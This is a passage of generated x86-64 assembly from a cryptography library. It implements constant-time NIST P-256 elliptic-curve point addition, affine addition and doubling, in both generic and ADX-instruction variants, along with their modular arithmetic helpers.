movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 512(%rsp),%rax
leaq 512(%rsp),%rbx
movq 0+256(%rsp),%r9
movq 8+256(%rsp),%r10
leaq 0+256(%rsp),%rsi
movq 16+256(%rsp),%r11
movq 24+256(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 224(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromq
orq %r13,%r12
movdqa %xmm4,%xmm2
orq %r8,%r12
orq %r9,%r12
por %xmm5,%xmm2
.byte 102,73,15,110,220
movq 384(%rsp),%rax
leaq 384(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq 0+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 480(%rsp),%rax
leaq 480(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 160(%rsp),%rbx
leaq 0(%rsp),%rdi
call __ecp_nistz256_sub_fromq
orq %r13,%r12
orq %r8,%r12
orq %r9,%r12
.byte 102,73,15,126,208
.byte 102,73,15,126,217
orq %r8,%r12
.byte 0x3e
jnz L$add_proceedq
testq %r9,%r9
jz L$add_doubleq
.byte 102,72,15,126,199
pxor %xmm0,%xmm0
movdqu %xmm0,0(%rdi)
movdqu %xmm0,16(%rdi)
movdqu %xmm0,32(%rdi)
movdqu %xmm0,48(%rdi)
movdqu %xmm0,64(%rdi)
movdqu %xmm0,80(%rdi)
jmp L$add_doneq
.p2align 5
L$add_doubleq:
.byte 102,72,15,126,206
.byte 102,72,15,126,199
addq $416,%rsp
jmp L$point_double_shortcutq
.p2align 5
L$add_proceedq:
movq 0+64(%rsp),%rax
movq 8+64(%rsp),%r14
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 448(%rsp),%rax
leaq 448(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 0+0(%rsp),%rax
movq 8+0(%rsp),%r14
leaq 0+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 544(%rsp),%rax
leaq 544(%rsp),%rbx
movq 0+352(%rsp),%r9
movq 8+352(%rsp),%r10
leaq 0+352(%rsp),%rsi
movq 16+352(%rsp),%r11
movq 24+352(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 0(%rsp),%rax
leaq 0(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 160(%rsp),%rax
leaq 160(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montq
xorq %r11,%r11
addq %r12,%r12
leaq 96(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subq
leaq 128(%rsp),%rbx
leaq 288(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 192+0(%rsp),%rax
movq 192+8(%rsp),%rbp
movq 192+16(%rsp),%rcx
movq 192+24(%rsp),%r10
leaq 320(%rsp),%rdi
call __ecp_nistz256_subq
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 128(%rsp),%rax
leaq 128(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq 0+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 320(%rsp),%rax
leaq 320(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 320(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 256(%rsp),%rbx
leaq 320(%rsp),%rdi
call __ecp_nistz256_sub_fromq
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 352(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 352+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 544(%rsp),%xmm2
pand 544+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 480(%rsp),%xmm2
pand 480+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 320(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 320+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 512(%rsp),%xmm2
pand 512+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
L$add_doneq:
leaq 576+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_addq_epilogue:
ret
.globl _ecp_nistz256_point_add_affine_nohw
.private_extern _ecp_nistz256_point_add_affine_nohw
.p2align 5
_ecp_nistz256_point_add_affine_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $480+8,%rsp
L$add_affineq_body:
movdqu 0(%rsi),%xmm0
movq %rdx,%rbx
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq 64+0(%rsi),%rax
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,320(%rsp)
movdqa %xmm1,320+16(%rsp)
movdqa %xmm2,352(%rsp)
movdqa %xmm3,352+16(%rsp)
movdqa %xmm4,384(%rsp)
movdqa %xmm5,384+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rbx),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rbx),%xmm1
movdqu 32(%rbx),%xmm2
por %xmm3,%xmm5
movdqu 48(%rbx),%xmm3
movdqa %xmm0,416(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,416+16(%rsp)
por %xmm0,%xmm1
.byte 102,72,15,110,199
movdqa %xmm2,448(%rsp)
movdqa %xmm3,448+16(%rsp)
por %xmm2,%xmm3
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm1,%xmm3
leaq 64-0(%rsi),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montq
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm3,%xmm4
movq 0(%rbx),%rax
movq %r12,%r9
por %xmm3,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
movq %r13,%r10
por %xmm3,%xmm4
pxor %xmm3,%xmm3
movq %r14,%r11
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
leaq 32-0(%rsp),%rsi
movq %r15,%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 320(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 384(%rsp),%rax
leaq 384(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 384(%rsp),%rax
leaq 384(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 288(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 448(%rsp),%rax
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq 0+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 352(%rsp),%rbx
leaq 96(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 0+64(%rsp),%rax
movq 8+64(%rsp),%r14
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 128(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 0+96(%rsp),%rax
movq 8+96(%rsp),%r14
leaq 0+96(%rsp),%rsi
movq 16+96(%rsp),%r15
movq 24+96(%rsp),%r8
leaq 192(%rsp),%rdi
call __ecp_nistz256_sqr_montq
movq 128(%rsp),%rax
leaq 128(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 320(%rsp),%rax
leaq 320(%rsp),%rbx
movq 0+128(%rsp),%r9
movq 8+128(%rsp),%r10
leaq 0+128(%rsp),%rsi
movq 16+128(%rsp),%r11
movq 24+128(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montq
xorq %r11,%r11
addq %r12,%r12
leaq 192(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subq
leaq 160(%rsp),%rbx
leaq 224(%rsp),%rdi
call __ecp_nistz256_sub_fromq
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 64(%rsp),%rdi
call __ecp_nistz256_subq
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 352(%rsp),%rax
leaq 352(%rsp),%rbx
movq 0+160(%rsp),%r9
movq 8+160(%rsp),%r10
leaq 0+160(%rsp),%rsi
movq 16+160(%rsp),%r11
movq 24+160(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montq
movq 96(%rsp),%rax
leaq 96(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq 0+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 64(%rsp),%rdi
call __ecp_nistz256_mul_montq
leaq 32(%rsp),%rbx
leaq 256(%rsp),%rdi
call __ecp_nistz256_sub_fromq
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand L$ONE_mont(%rip),%xmm2
pand L$ONE_mont+16(%rip),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 224(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 224+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 320(%rsp),%xmm2
pand 320+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 256(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 256+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 352(%rsp),%xmm2
pand 352+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
leaq 480+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$add_affineq_epilogue:
ret
.p2align 5
__ecp_nistz256_add_tox:
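// ADX-flavored twin of __ecp_nistz256_add_toq: the leading xorq
// clears CF so the adcq chain starts clean; the reduction logic is
// otherwise unchanged.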
xorq %r11,%r11
adcq 0(%rbx),%r12
adcq 8(%rbx),%r13
movq %r12,%rax
adcq 16(%rbx),%r8
adcq 24(%rbx),%r9
movq %r13,%rbp
adcq $0,%r11
xorq %r10,%r10
sbbq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_sub_fromx:
xorq %r11,%r11
sbbq 0(%rbx),%r12
sbbq 8(%rbx),%r13
movq %r12,%rax
sbbq 16(%rbx),%r8
sbbq 24(%rbx),%r9
movq %r13,%rbp
sbbq $0,%r11
xorq %r10,%r10
adcq $-1,%r12
movq %r8,%rcx
adcq %r14,%r13
adcq $0,%r8
movq %r9,%r10
adcq %r15,%r9
btq $0,%r11
cmovncq %rax,%r12
cmovncq %rbp,%r13
movq %r12,0(%rdi)
cmovncq %rcx,%r8
movq %r13,8(%rdi)
cmovncq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.p2align 5
__ecp_nistz256_subx:
xorq %r11,%r11
sbbq %r12,%rax
sbbq %r13,%rbp
movq %rax,%r12
sbbq %r8,%rcx
sbbq %r9,%r10
movq %rbp,%r13
sbbq $0,%r11
xorq %r9,%r9
adcq $-1,%rax
movq %rcx,%r8
adcq %r14,%rbp
adcq $0,%rcx
movq %r10,%r9
adcq %r15,%r10
btq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
cmovcq %rcx,%r8
cmovcq %r10,%r9
ret
.p2align 5
__ecp_nistz256_mul_by_2x:
xorq %r11,%r11
adcq %r12,%r12
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
xorq %r10,%r10
sbbq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rcx,%r8
movq %r13,8(%rdi)
cmovcq %r10,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_point_double_adx
.private_extern _ecp_nistz256_point_double_adx
.p2align 5
_ecp_nistz256_point_double_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $160+8,%rsp
L$point_doublex_body:
L$point_double_shortcutx:
movdqu 0(%rsi),%xmm0
movq %rsi,%rbx
movdqu 16(%rsi),%xmm1
movq 32+0(%rsi),%r12
movq 32+8(%rsi),%r13
movq 32+16(%rsi),%r8
movq 32+24(%rsi),%r9
movq L$poly+8(%rip),%r14
movq L$poly+24(%rip),%r15
movdqa %xmm0,96(%rsp)
movdqa %xmm1,96+16(%rsp)
leaq 32(%rdi),%r10
leaq 64(%rdi),%r11
.byte 102,72,15,110,199
.byte 102,73,15,110,202
.byte 102,73,15,110,211
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_by_2x
movq 64+0(%rsi),%rdx
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
leaq 64-128(%rsi),%rsi
leaq 64(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 0+0(%rsp),%rdx
movq 8+0(%rsp),%r14
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 0(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 32(%rbx),%rdx
movq 64+0(%rbx),%r9
movq 64+8(%rbx),%r10
movq 64+16(%rbx),%r11
movq 64+24(%rbx),%r12
leaq 64-128(%rbx),%rsi
leaq 32(%rbx),%rbx
.byte 102,72,15,126,215
call __ecp_nistz256_mul_montx
call __ecp_nistz256_mul_by_2x
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_tox
movq 96+0(%rsp),%r12
movq 96+8(%rsp),%r13
leaq 64(%rsp),%rbx
movq 96+16(%rsp),%r8
movq 96+24(%rsp),%r9
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 0+0(%rsp),%rdx
movq 8+0(%rsp),%r14
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
.byte 102,72,15,126,207
call __ecp_nistz256_sqr_montx
xorq %r9,%r9
movq %r12,%rax
addq $-1,%r12
movq %r13,%r10
adcq %rsi,%r13
movq %r14,%rcx
adcq $0,%r14
movq %r15,%r8
adcq %rbp,%r15
adcq $0,%r9
xorq %rsi,%rsi
testq $1,%rax
cmovzq %rax,%r12
cmovzq %r10,%r13
cmovzq %rcx,%r14
cmovzq %r8,%r15
cmovzq %rsi,%r9
movq %r13,%rax
shrq $1,%r12
shlq $63,%rax
movq %r14,%r10
shrq $1,%r13
orq %rax,%r12
shlq $63,%r10
movq %r15,%rcx
shrq $1,%r14
orq %r10,%r13
shlq $63,%rcx
movq %r12,0(%rdi)
shrq $1,%r15
movq %r13,8(%rdi)
shlq $63,%r9
orq %rcx,%r14
orq %r9,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
movq 64(%rsp),%rdx
leaq 64(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2x
leaq 32(%rsp),%rbx
leaq 32(%rsp),%rdi
call __ecp_nistz256_add_tox
movq 96(%rsp),%rdx
leaq 96(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 128(%rsp),%rdi
call __ecp_nistz256_mul_by_2x
movq 0+32(%rsp),%rdx
movq 8+32(%rsp),%r14
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r15
movq 24+32(%rsp),%r8
.byte 102,72,15,126,199
call __ecp_nistz256_sqr_montx
leaq 128(%rsp),%rbx
movq %r14,%r8
movq %r15,%r9
movq %rsi,%r14
movq %rbp,%r15
call __ecp_nistz256_sub_fromx
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 0(%rsp),%rdi
call __ecp_nistz256_subx
movq 32(%rsp),%rdx
leaq 32(%rsp),%rbx
movq %r12,%r14
xorl %ecx,%ecx
movq %r12,0+0(%rsp)
movq %r13,%r10
movq %r13,0+8(%rsp)
cmovzq %r8,%r11
movq %r8,0+16(%rsp)
leaq 0-128(%rsp),%rsi
cmovzq %r9,%r12
movq %r9,0+24(%rsp)
movq %r14,%r9
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
.byte 102,72,15,126,203
.byte 102,72,15,126,207
call __ecp_nistz256_sub_fromx
leaq 160+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$point_doublex_epilogue:
ret
.globl _ecp_nistz256_point_add_adx
.private_extern _ecp_nistz256_point_add_adx
.p2align 5
_ecp_nistz256_point_add_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
subq $576+8,%rsp
L$point_addx_body:
movdqu 0(%rsi),%xmm0
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
movdqu 48(%rsi),%xmm3
movdqu 64(%rsi),%xmm4
movdqu 80(%rsi),%xmm5
movq %rsi,%rbx
movq %rdx,%rsi
movdqa %xmm0,384(%rsp)
movdqa %xmm1,384+16(%rsp)
movdqa %xmm2,416(%rsp)
movdqa %xmm3,416+16(%rsp)
movdqa %xmm4,448(%rsp)
movdqa %xmm5,448+16(%rsp)
por %xmm4,%xmm5
movdqu 0(%rsi),%xmm0
pshufd $0xb1,%xmm5,%xmm3
movdqu 16(%rsi),%xmm1
movdqu 32(%rsi),%xmm2
por %xmm3,%xmm5
movdqu 48(%rsi),%xmm3
movq 64+0(%rsi),%rdx
movq 64+8(%rsi),%r14
movq 64+16(%rsi),%r15
movq 64+24(%rsi),%r8
movdqa %xmm0,480(%rsp)
pshufd $0x1e,%xmm5,%xmm4
movdqa %xmm1,480+16(%rsp)
movdqu 64(%rsi),%xmm0
movdqu 80(%rsi),%xmm1
movdqa %xmm2,512(%rsp)
movdqa %xmm3,512+16(%rsp)
por %xmm4,%xmm5
pxor %xmm4,%xmm4
por %xmm0,%xmm1
.byte 102,72,15,110,199
leaq 64-128(%rsi),%rsi
movq %rdx,544+0(%rsp)
movq %r14,544+8(%rsp)
movq %r15,544+16(%rsp)
movq %r8,544+24(%rsp)
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montx
pcmpeqd %xmm4,%xmm5
pshufd $0xb1,%xmm1,%xmm4
por %xmm1,%xmm4
pshufd $0,%xmm5,%xmm5
pshufd $0x1e,%xmm4,%xmm3
por %xmm3,%xmm4
pxor %xmm3,%xmm3
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
movq 64+0(%rbx),%rdx
movq 64+8(%rbx),%r14
movq 64+16(%rbx),%r15
movq 64+24(%rbx),%r8
.byte 102,72,15,110,203
leaq 64-128(%rbx),%rsi
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 544(%rsp),%rdx
leaq 544(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq -128+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 448(%rsp),%rdx
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 416(%rsp),%rdx
leaq 416(%rsp),%rbx
movq 0+224(%rsp),%r9
movq 8+224(%rsp),%r10
leaq -128+224(%rsp),%rsi
movq 16+224(%rsp),%r11
movq 24+224(%rsp),%r12
leaq 224(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 512(%rsp),%rdx
leaq 512(%rsp),%rbx
movq 0+256(%rsp),%r9
movq 8+256(%rsp),%r10
leaq -128+256(%rsp),%rsi
movq 16+256(%rsp),%r11
movq 24+256(%rsp),%r12
leaq 256(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 224(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromx
orq %r13,%r12
movdqa %xmm4,%xmm2
orq %r8,%r12
orq %r9,%r12
por %xmm5,%xmm2
.byte 102,73,15,110,220
movq 384(%rsp),%rdx
leaq 384(%rsp),%rbx
movq 0+96(%rsp),%r9
movq 8+96(%rsp),%r10
leaq -128+96(%rsp),%rsi
movq 16+96(%rsp),%r11
movq 24+96(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 480(%rsp),%rdx
leaq 480(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 192(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 160(%rsp),%rbx
leaq 0(%rsp),%rdi
call __ecp_nistz256_sub_fromx
orq %r13,%r12
orq %r8,%r12
orq %r9,%r12
.byte 102,73,15,126,208
.byte 102,73,15,126,217
orq %r8,%r12
.byte 0x3e
jnz L$add_proceedx
testq %r9,%r9
jz L$add_doublex
.byte 102,72,15,126,199
pxor %xmm0,%xmm0
movdqu %xmm0,0(%rdi)
movdqu %xmm0,16(%rdi)
movdqu %xmm0,32(%rdi)
movdqu %xmm0,48(%rdi)
movdqu %xmm0,64(%rdi)
movdqu %xmm0,80(%rdi)
jmp L$add_donex
.p2align 5
L$add_doublex:
.byte 102,72,15,126,206
.byte 102,72,15,126,199
addq $416,%rsp
jmp L$point_double_shortcutx
.p2align 5
L$add_proceedx:
movq 0+64(%rsp),%rdx
movq 8+64(%rsp),%r14
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 96(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 448(%rsp),%rdx
leaq 448(%rsp),%rbx
movq 0+0(%rsp),%r9
movq 8+0(%rsp),%r10
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r11
movq 24+0(%rsp),%r12
leaq 352(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 0+0(%rsp),%rdx
movq 8+0(%rsp),%r14
leaq -128+0(%rsp),%rsi
movq 16+0(%rsp),%r15
movq 24+0(%rsp),%r8
leaq 32(%rsp),%rdi
call __ecp_nistz256_sqr_montx
